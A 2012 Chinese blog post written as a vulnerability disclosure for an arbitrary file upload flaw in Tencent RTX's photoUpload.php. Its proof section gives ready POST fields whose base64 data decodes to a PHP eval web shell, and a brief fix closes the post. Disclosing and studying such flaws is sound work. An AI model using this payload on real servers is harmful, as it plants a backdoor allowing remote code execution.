Chinaunix首页 | 论坛 | 博客
  • 博客访问: 529826
  • 博文数量: 33
  • 博客积分: 3755
  • 博客等级: 中校
  • 技术积分: 496
  • 用 户 组: 普通用户
  • 注册时间: 2009-11-24 23:24
文章存档

2012年(14)

2011年(11)

2010年(7)

2009年(1)

分类: 网络与安全

2012-03-31 00:29:41

简要描述:

安装RTX后打开IP:8012网址
腾讯RTX存在UserPhoto/photoUpload.php任意文件上传漏洞

详细说明:

简单的一个post表单即可上传
$user_account = $_POST['user_account'];
$file_name = $_POST["file_name"];
$file_data = $_POST["file_data"];
无任何过滤

漏洞证明:

 

图片

 user_account=1000
file_name=s.php
file_data=PD9waHAgZXZhbCgkX1BPU1Rbc2JdKT8+
file_data为base64_encode数据
post提交后UserPhoto目录下生成PhotoFiles/s.php
需要extension=php_mbstring.dll开启及php4

修复方案:

上传过滤

阅读(2982) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~